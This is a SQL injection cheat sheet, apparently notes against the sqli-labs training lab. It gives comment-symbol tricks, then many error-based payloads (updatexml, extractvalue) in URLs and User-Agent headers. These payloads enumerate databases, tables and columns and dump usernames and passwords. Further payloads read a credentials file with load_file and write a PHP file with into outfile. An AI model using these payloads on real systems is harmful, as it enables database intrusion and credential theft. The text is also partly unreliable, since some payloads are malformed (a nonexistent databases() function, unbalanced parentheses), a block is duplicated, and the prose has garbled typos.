Commonly used simple test statements and comment symbols
The comment symbol of the sql statement is the key point of the sq injection statement: commonly used # and --
1. # and -- (with a space) represent comments, which can prevent the statements behind them from being executed. In url, if it is a get request, it is the url we input in the browser address bar. When explaining and executing, the # in ur1 is used to guide the browser's actions, and it is useless to the server. Therefore, the HTTP request does not include #, so using # to close cannot be commented, and an error will be reported: while using -- (with a space), the space will be ignored during the transmission process, which also makes it impossible to comment, so the gt request parameter injection Only use --+ to close, because + will be interpreted as a space.
2. Of course, --%20 can also be used to convert spaces into url encode format without error. Similarly, changing # into %23 will not report an error.
3. If it is a post request, you can directly use # to close it. The common one is form injection, such as we inject in the background login box.
4. Why must there be a space after -- but not after #? Because when using -- comments, you need to use spaces to form a valid sq1 statement, and # can be followed by spaces or not. Because there is no space, -- is directly connected with the single quotation marks automatically generated by the system, which will be considered as a keyword, and the single quotation marks automatically generated by the system cannot be commented out.
Simple test statement:
xx' or1=1 --+ one condition is true, it is true, the true effect is to query all the data in the table
xx' and1=2 --+ one condition is false, it is false
xx' and1=1 -- + two conditions are true to be true
union select... union query
Error injection
Updatexml(): The function is an XPATH function for MYSQL to query and modify XML document data.
extractvalue(): The function is also an XPATH function for MYSQL to query XML document data.
floor(0: The function used for rounding in MYSQL.
UPDATEXML (XML_document,XPath_string,new_value);
https://pythonjishu.com/mysql-updatexmlMySQL's UPDATEXML() function can be used to modify XML type data, which can update one or more node values in XML data.
This function has three parameters:
- XML data
- XPath expression: used to specify the node position to be modified
- new node value: the value used to replace the current node
Following is the syntax of the UPDATEXML() function:
UPDATEXML(xml_target, xpath_expr, new_val)
• Specific usage:
xx 'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# (get the database version)
xx 'and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)# (get the current user)
xx 'and updatexml(1,concat(0x7e,(SELECT databases()),0x7e),1)# (get the database name)
k' and updatexml(1,concat(0x7e,select table_name from information_schema.tables where table_schema='mysql' limit 0,1)),0)# (error injection, get table name)
k'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0)# (error injection, get field name)
k'and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
Common HTTP header injection
UA header injection
Inject the Useragent in the HTTP request header
Referer injection
Referer: When you visit a website, your browser needs to tell the server where you are accessing the server from. (Directly enter the URL or click on the links in other pages).
Cookie injection
A cookie is a string of characters, which is a method for the browser to save the data returned by the server, and usually saves user identity information. It is the data (usually encrypted) stored on the user's local terminal by some websites in order to identify the user's identity and conduct Session tracking, and the information is temporarily or permanently stored by the user's client computer
session When accessing a web page on the server, a piece of memory will be opened up in the memory on the server side. This piece of memory is called a session, and this memory is associated with the browser. This browser refers to the browser window, or the sub-window of the browser, which means that only the browser corresponding to the current session is allowed to access, even a newly launched browser on the same machine cannot be accessed. If another browser also needs to record the session, it will open another session of its own. also known as session control
Example of User-Agent injection:
Get the current database name
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,database())),'','')#
Get all table names
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名'))),'','')#
The maximum length of the error message that can be displayed by the extractvalue() function is 32. If the error message exceeds the maximum length, it may cause incomplete display. Therefore, sometimes it is necessary to use the limit to display the branches. The above payload can be changed to:
User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))),'', '')#
//Display the name of the first table in the security library
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select table_name from information_schema .tables where table_schema='security' limit 1,1))),'','')#
//Display the name of the second table in the security library
User-Agent:Mozilla/5.0......Firefox /46.0' and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 2,1))),'','')# //Display the first table in the security
library 3 table names
get all field names
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),'','')#
If the length is limited, limit pagination can be used
User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) )),'','')#
//Display the name of the first field in the users table
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~' ,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))),'','')# //Display the name of the second
field in the users table
User- Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1) )),'','')#
//Display the name of the third field in the users table
...
display field value
User-Agent:Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select concat_ws(',',id,username,password) from security.users limit 0,1))),'','')#
other samples
xx 'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# (get the database version)
xx 'and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)# (get the current user)
xx 'and updatexml(1,concat(0x7e,(SELECT databases()),0x7e),1)# (get the database name)
k' and updatexml(1,concat(0x7e,select table_name from information_schema.tables where table_schema='mysql' limit 0,1)),0)# (error injection, get table name)
k'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0)# (error injection, get field name)
k'and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
File read and write operations
load_file(): read function
into outfile or into dumpfile: export function
Common methods for obtaining paths
Error display, legacy files, bug reports, platform configuration files, blasting, etc.
-
http://127.0.0.1:8888/Less-2/?id=-1%20union%20select%201,load_file(%27D:\\Software\\PhpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\sql-connections\\db-creds.inc%27),3(read local file)
http://127.0.0.1:8888/Less-2/?id=-1%20union%20select%201,%20%27x%27%20,3%20into%20outfile%20%27D:\\x.php%27%20--+local file write